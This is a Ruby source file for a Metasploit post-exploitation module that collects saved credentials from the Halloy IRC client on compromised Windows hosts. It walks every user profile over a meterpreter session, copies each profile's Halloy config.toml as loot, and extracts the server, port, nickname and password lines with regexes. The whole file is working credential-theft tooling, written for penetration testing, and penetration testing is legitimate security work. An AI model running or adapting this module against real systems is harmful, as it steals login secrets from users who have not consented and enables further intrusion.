# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-exploitation credential gatherer for the Halloy IRC client.
#
# For every Windows user profile on the session it hands the Packrat mixin
# the ARTIFACTS table below; Packrat locates the client's config.toml under
# the profile's AppData directory, keeps it as loot and extracts the lines
# that carry saved connection details. The module itself only enumerates
# profiles and prints what it is doing — Notes declares it CRASH_SAFE with
# no side effects.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Artifact table consumed by run_packrat.
  #
  # One gatherable artifact: <user AppData>/halloy/config.toml, tagged with
  # the +filetypes+ value 'logins' (which also becomes the selectable value of
  # the ARTIFACTS option). Each regex string is written as an inline-option
  # group, (?i-mx:...), so the key is matched case-insensitively and — assuming
  # Packrat compiles these as Ruby Regexps — the trailing .* stops at the end of
  # the line because multiline mode is switched off. The whole assignment line
  # is therefore captured verbatim, password line included.
  ARTIFACTS = {
    application: 'Halloy IRC',
    app_category: 'IRC',
    gatherable_artifacts: [
      {
        filetypes: 'logins',
        path: 'AppData',
        dir: 'halloy',
        artifact_file_name: 'config.toml',
        description: 'Saved Bookmarks',
        credential_type: 'text',
        regex_search: [
          {
            extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
            extraction_type: 'credentials',
            # Expands to '(?i-mx:server =.*)', '(?i-mx:port =.*)',
            # '(?i-mx:nickname =.*)', '(?i-mx:password =.*)' — one pattern
            # per TOML key, in that order.
            regex: %w[server port nickname password].map { |key| "(?i-mx:#{key} =.*)" }
          }
        ]
      }
    ]
  }.freeze

  # Registers module metadata and the three datastore options.
  #
  # @param info [Hash] extra module info merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Halloy IRC Credential Gatherer',
        'Description' => %q{
          This module searches for credentials stored on Halloy IRC Client on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jacob Tierney',
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        # The enum's choices are derived from the ARTIFACTS table so that adding
        # an artifact there automatically makes it selectable here; 'All' is
        # both the first choice and the default.
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', artifact_choices])
      ]
    )
  end

  # Prints the effective option selections, then runs one Packrat sweep per
  # user profile found on the host.
  #
  # @return [void]
  def run
    selections = [
      ['ARTIFACTS', datastore['ARTIFACTS'].capitalize],
      ['STORE_LOOT', datastore['STORE_LOOT']],
      # The trailing newline leaves a blank line after the summary block.
      ['EXTRACT_DATA', "#{datastore['EXTRACT_DATA']}\n"]
    ]

    print_status('Filtering based on these selections: ')
    selections.each { |option, value| print_status("#{option}: #{value}") }

    # STORE_LOOT / EXTRACT_DATA are not passed explicitly; presumably Packrat
    # reads them from the datastore itself — confirm against the mixin.
    grab_user_profiles.each { |profile| run_packrat(profile, ARTIFACTS) }

    print_status 'PackRat credential sweep completed'
  end

  private

  # Selectable values for the ARTIFACTS option: 'All' followed by each
  # distinct +filetypes+ tag in ARTIFACTS[:gatherable_artifacts].
  #
  # @return [Array<String>]
  def artifact_choices
    types = ARTIFACTS[:gatherable_artifacts].map { |artifact| artifact[:filetypes] }.uniq
    ['All', *types]
  end
end